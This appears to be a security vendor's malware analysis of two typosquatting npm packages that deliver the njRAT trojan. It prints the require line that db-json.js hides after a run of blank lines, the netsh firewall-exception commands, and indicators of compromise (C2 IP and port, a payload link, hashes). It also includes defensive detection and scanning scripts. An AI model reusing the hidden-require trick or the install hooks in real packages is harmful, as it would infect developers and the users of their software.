
New npm malware with Bladabindi trojan

Over Thanksgiving weekend, we discovered two new malicious packages in the npm registry that drop a Remote Access Trojan (RAT).

The malicious packages are:

jdb.js
db-json.js

Both packages were published by the same author.

“jdb.js” attempts to mimic the legitimate Node.js database library jdb. Likewise, the name “db-json.js” is chosen to be confused with the legitimate db-json library.

However, “jdb.js” is actually a malicious package that bundles a remote access trojan (RAT) called njRAT, also known as Bladabindi.

A RAT is a type of malware that allows an attacker to take control of an infected system, execute arbitrary commands, run keyloggers and carry out other surveillance activities covertly.

njRAT is an information-stealing trojan that has been deployed in such a wide range of attacks that in 2014 Microsoft took down 4 million websites in response.

In recent years, variants of njRAT/Bladabindi have spread through Bitcoin scams on YouTube and through phishing emails carrying Excel attachments. Given njRAT's customizability and its ready availability on the dark web, the malware has also been used as part of ransomware toolkits.

Dissecting the npm malware “jdb.js”
Released last week, “jdb.js” is an npm package (despite its name, not a single JavaScript file) with only one version, 1.0.0, containing three files:

package.json, the manifest file
module.js, a heavily obfuscated script
patch.exe, the executable carrying the njRAT payload

On installation, the package.json manifest launches module.js.

module.js is a highly obfuscated script containing multiple base64-encoded blocks that cannot simply be decoded into source: decoding them yields garbled output, which indicates that the blocks hold binary or encrypted data rather than text.

The script performs a variety of malicious activities, such as data collection and reconnaissance, and eventually launches patch.exe, the njRAT dropper.

Although patch.exe belongs to an older, known njRAT strain, at the time of our analysis VirusTotal showed that this particular sample had first been submitted to the service by Sonatype the previous week, so at least some of its contents were new.

Decompiling the executable reveals the key details.

One of the class constructors, named “OK”, holds hard-coded strings that reveal the location of the command and control (C2) server, the port the malware communicates on, the local folder it installs into, and more.

[Screenshot: hard-coded strings in the patch.exe sample, such as the C2 server IP address and the name of the dropped executable.]

Once patch.exe runs, it copies itself to the system's local “TEMP” folder and renames the copy “dchps.exe” (the value shown in the screenshot). The C2 server it then connects to is 46.185.116.2 on port 5552 (see the ZoomEye search result for that host).

Before communicating with the C2 infrastructure, the malicious executable modifies the Windows firewall rules so that its traffic to the hard-coded IP is not blocked. To do so it invokes the legitimate “netsh” command several times for the executable at the following location:

C:\Users\admin\AppData\Local\Temp\dchps.exe, dchps.exe

The commands that the C2 server operator can execute remotely are quite extensive.

Once a host is infected, remote attackers can log keystrokes, modify registry values, shut down or reboot the system at will, change the web browser (IE) start page, speak to the user through voice synthesis, kill or restart system processes (such as Task Manager, System Restore and PING) and control hardware devices (CD drives, monitors, mice, keyboards and so on).

The malware also contains a hard-coded link to https://dl.dropbox[.]com/s/p84aaz28t0hepul/Pass.exe, which Dropbox has since disabled; the same link turns up frequently in other njRAT samples.

Notably, the C2 server IP 46.185.116.2 (the ZoomEye search result) that this sample communicates with is identical to an IOC observed in some CursedGrabber binaries, suggesting that CursedGrabber and the npm malware “jdb.js” are related.
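As an added example (not code from the original post), here is detection logic for the host-side behaviour described above, run over a few constructed Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) events. The event field names and the exact netsh command lines, including the benign advfirewall rule used as a control, are assumptions; the dropped file path C:\Users\admin\AppData\Local\Temp\dchps.exe and the C2 address 46.185.116.2:5552 are the indicators given in the post.

```javascript
// Added example, not code from the original post. Flags three behaviours the post
// describes: an executable running from %TEMP%, a netsh firewall exception for such
// an executable, and a connection to the published C2. Field names follow Sysmon's
// process-creation (EventID 1) and network-connection (EventID 3) events; the netsh
// command syntax in the fixtures is an assumption.

const KNOWN_C2 = new Set(["46.185.116.2:5552"]);        // IP:port from the post
const KNOWN_DROP_NAMES = new Set(["dchps.exe"]);         // dropped file name from the post
// An .exe under a user's local Temp directory (matches inside a quoted command line too).
const TEMP_EXE_RE = /\\AppData\\Local\\Temp\\[^"\s]+\.exe\b/i;
// Legacy "netsh firewall add allowedprogram" and modern "netsh advfirewall firewall add rule".
const NETSH_ALLOW_RE = /\bnetsh(?:\.exe)?"?\s+(?:firewall\s+add\s+allowedprogram|advfirewall\s+firewall\s+add\s+rule)\b/i;

const basename = (p) => (p || "").split("\\").pop().toLowerCase();

// Returns the list of alerts a single event raises (empty for benign events).
function detect(ev) {
  const alerts = [];
  if (ev.EventID === 1) {
    const cmd = ev.CommandLine || "";
    if (TEMP_EXE_RE.test(ev.Image)) alerts.push("executable launched from %TEMP%");
    if (KNOWN_DROP_NAMES.has(basename(ev.Image))) alerts.push(`known njRAT dropped file name ${basename(ev.Image)}`);
    // Require BOTH the firewall-exception syntax and a %TEMP% program path, so a
    // legitimate rule for an installed application does not fire.
    if (NETSH_ALLOW_RE.test(cmd) && TEMP_EXE_RE.test(cmd)) alerts.push("netsh firewall exception added for an executable in %TEMP%");
  } else if (ev.EventID === 3) {
    const dst = `${ev.DestinationIp}:${ev.DestinationPort}`;
    if (KNOWN_C2.has(dst)) alerts.push(`connection to known njRAT C2 ${dst}`);
    if (TEMP_EXE_RE.test(ev.Image)) alerts.push("network connection from an executable in %TEMP%");
  }
  return alerts;
}

// Only the events that raised at least one alert, with their position in the stream.
function scanEvents(events) {
  return events
    .map((ev, index) => ({ index, image: ev.Image, alerts: detect(ev) }))
    .filter((r) => r.alerts.length > 0);
}

// Constructed sample stream: the malicious sequence interleaved with benign activity.
const SAMPLE_EVENTS = [
  { EventID: 1, Image: String.raw`C:\Users\admin\AppData\Local\Temp\dchps.exe`,
    CommandLine: String.raw`"C:\Users\admin\AppData\Local\Temp\dchps.exe"` },
  { EventID: 1, Image: String.raw`C:\Windows\System32\netsh.exe`,
    CommandLine: String.raw`netsh firewall add allowedprogram "C:\Users\admin\AppData\Local\Temp\dchps.exe" "dchps.exe" ENABLE` },
  { EventID: 1, Image: String.raw`C:\Windows\System32\netsh.exe`,   // benign control
    CommandLine: String.raw`netsh advfirewall firewall add rule name="Node.js" dir=in action=allow program="C:\Program Files\nodejs\node.exe"` },
  { EventID: 3, Image: String.raw`C:\Users\admin\AppData\Local\Temp\dchps.exe`,
    DestinationIp: "46.185.116.2", DestinationPort: 5552 },
  { EventID: 3, Image: String.raw`C:\Program Files\nodejs\node.exe`,   // benign control
    DestinationIp: "104.16.20.35", DestinationPort: 443 },
];

for (const hit of scanEvents(SAMPLE_EVENTS)) {
  console.log(`#${hit.index} ${hit.image}: ${hit.alerts.join("; ")}`);
}
```

The netsh check is deliberately conjunctive (exception syntax plus a program path under AppData\Local\Temp), so the benign rule for an installed application in the sample stream is not reported, and the C2 match is exact on IP and port because that is all the published IOC supports.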

While “jdb.js” shows clear signs of malice, it is “db-json.js” that is the more worrying of the two, because it is much harder to spot.

First, at the time of analysis, “db-json.js” had a proper README page on npm describing it as “JsonDb – an easy to use module that makes the database based on json files.”

There are detailed instructions for developers on how to incorporate this library into their applications.

At first glance the “db-json.js” package looks clean: it contains the functional code you would expect from a real JSON-file database package. However, it quietly pulls in the malicious “jdb.js” as a dependency.

Shown below are the manifest files from versions 1.0.3 and 1.0.4, which contain “jdb.js” as a dependency.

In addition, in version 1.0.4 the “dbmanager.js” class was extended by appending a long run of blank lines after its functional code, followed by a final line:

require('jdb.js');

This means that a developer who uses “db-json.js” in their application, even while steering clear of “jdb.js”, not only gets infected with njRAT themselves but also puts others at risk: anyone who installs or uses an application built with “db-json.js”.
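As an added example (not code from the Sonatype post or from the packages it describes), the following Node.js script checks an installed dependency tree for the warning signs described above: install-time lifecycle scripts in package.json, a direct or transitive dependency on a known-bad name such as jdb.js, a require() hidden behind a run of trailing blank lines, and long base64 literals that decode to binary rather than text. The package tree, the file contents and the postinstall hook name are constructed fixtures; the post only says that the manifest launches module.js on installation and that dbmanager.js ends in require('jdb.js') after many blank lines.

```javascript
// Added example, not code from the original post or from "jdb.js"/"db-json.js".
// Offline scanner for four warning signs: lifecycle scripts, a (transitive) dependency
// on a known-bad name, a require() hidden behind trailing blank lines, and base64
// literals whose decoded bytes look like binary. The fixtures at the bottom are
// constructed; the "postinstall" hook name is an assumption.

const KNOWN_BAD = new Set(["jdb.js"]);            // package name from the post
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"];

// Shannon entropy in bits per byte: prose sits around 4-5, packed/encrypted data near 8.
function entropy(bytes) {
  if (bytes.length === 0) return 0;
  const counts = new Array(256).fill(0);
  for (const b of bytes) counts[b]++;
  let h = 0;
  for (const c of counts) {
    if (c) { const p = c / bytes.length; h -= p * Math.log2(p); }
  }
  return h;
}

// Base64 literals of 64+ chars whose decoded bytes are mostly non-printable or
// high-entropy. A base64-wrapped text string decodes cleanly and is not reported.
function binaryBase64Blobs(source) {
  const hits = [];
  const re = /[A-Za-z0-9+/]{64,}={0,2}/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const bytes = Buffer.from(m[0], "base64");
    const printable = bytes.filter((b) => b === 9 || b === 10 || b === 13 || (b >= 32 && b < 127)).length;
    const h = entropy(bytes);
    if (printable / bytes.length < 0.9 || h > 6) {
      hits.push({ offset: m.index, length: m[0].length, entropy: Number(h.toFixed(2)) });
    }
  }
  return hits;
}

// A require() as the last non-blank line of a file, preceded by many blank lines
// (the pattern the post describes for dbmanager.js in db-json.js 1.0.4).
function trailingRequire(source, minBlankLines = 5) {
  const lines = source.split(/\r?\n/);
  while (lines.length && lines[lines.length - 1].trim() === "") lines.pop();
  const m = /^\s*require\(\s*['"]([^'"]+)['"]\s*\);?\s*$/.exec(lines[lines.length - 1] || "");
  if (!m) return null;
  let blanks = 0;
  for (let i = lines.length - 2; i >= 0 && lines[i].trim() === ""; i--) blanks++;
  return blanks >= minBlankLines ? { module: m[1], blankLinesBefore: blanks } : null;
}

// Walk an installed tree. Each node: { name, version, manifest, files, deps }.
function scanTree(pkg, chain = [], findings = []) {
  const here = [...chain, `${pkg.name}@${pkg.version}`];
  const path = here.join(" > ");
  const manifest = pkg.manifest || {};
  if (KNOWN_BAD.has(pkg.name)) findings.push({ path, kind: "known-bad-package", detail: pkg.name });
  for (const hook of LIFECYCLE) {
    const cmd = (manifest.scripts || {})[hook];
    if (cmd) findings.push({ path, kind: "lifecycle-script", detail: `${hook}: ${cmd}` });
  }
  for (const dep of Object.keys(manifest.dependencies || {})) {
    if (KNOWN_BAD.has(dep)) findings.push({ path, kind: "depends-on-known-bad", detail: dep });
  }
  for (const [file, source] of Object.entries(pkg.files || {})) {
    const tr = trailingRequire(source);
    if (tr) findings.push({ path, kind: "trailing-require", detail: `${file}: require('${tr.module}') after ${tr.blankLinesBefore} blank lines` });
    for (const blob of binaryBase64Blobs(source)) {
      findings.push({ path, kind: "binary-base64", detail: `${file}@${blob.offset}: ${blob.length} chars, entropy ${blob.entropy}` });
    }
  }
  for (const dep of pkg.deps || []) scanTree(dep, here, findings);
  return findings;
}

// Constructed fixtures (not the real package contents). BINARY_BLOB is 96 distinct
// bytes, standing in for an encrypted payload; TEXT_BLOB is base64-wrapped prose.
const BINARY_BLOB = Buffer.from(Array.from({ length: 96 }, (_, i) => (i * 73 + 17) % 256)).toString("base64");
const TEXT_BLOB = Buffer.from("JsonDb stores each collection in its own .json file. ".repeat(3)).toString("base64");

const jdbJs = {
  name: "jdb.js", version: "1.0.0",
  manifest: { scripts: { postinstall: "node module.js" } },   // hook name is an assumption
  files: { "module.js": `var _0x1 = "${BINARY_BLOB}";\n/* obfuscated loader omitted */\n` },
  deps: [],
};
const dbJsonJs = {
  name: "db-json.js", version: "1.0.4",
  manifest: { dependencies: { "jdb.js": "^1.0.0" } },
  files: {
    "dbmanager.js":
      `const BANNER = "${TEXT_BLOB}";\nclass DbManager { /* functional JSON-file DB code */ }\nmodule.exports = DbManager;\n` +
      "\n".repeat(20) + "require('jdb.js');\n",
  },
  deps: [jdbJs],
};
const sampleApp = { name: "my-app", version: "0.1.0", manifest: { dependencies: { "db-json.js": "^1.0.4" } }, files: {}, deps: [dbJsonJs] };

for (const f of scanTree(sampleApp)) console.log(`[${f.kind}] ${f.path}: ${f.detail}`);
```

With the fixtures above each check fires exactly once along the path my-app > db-json.js > jdb.js, while the base64-wrapped prose in dbmanager.js and a short file that merely ends in a require() are left alone. Against a real project, replace the fixtures with a walk of node_modules (reading each package.json and the .js files beside it) and feed KNOWN_BAD from a blocklist.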

In our latest State of the Software Supply Chain report we recorded a 430% increase in next-generation software supply chain attacks, in which malicious code is injected into OSS projects, and this is not the first time we have seen attacks that rely on counterfeit components. Without adequate protections in place, such attacks can do real damage to the software supply chain.

URLs and IPs:
46.185.116.2:5552

https://dl.dropbox[.]com/s/p84aaz28t0hepul/Pass.exe

Hashes:
d6c04cc24598c63e1d561768663808ff43a73d3876aee17d90e2ea01ee9540ff
86c11e56a1a3fed321e9ddc191601a318148b4d3e40c96f1764bfa05c5dbf212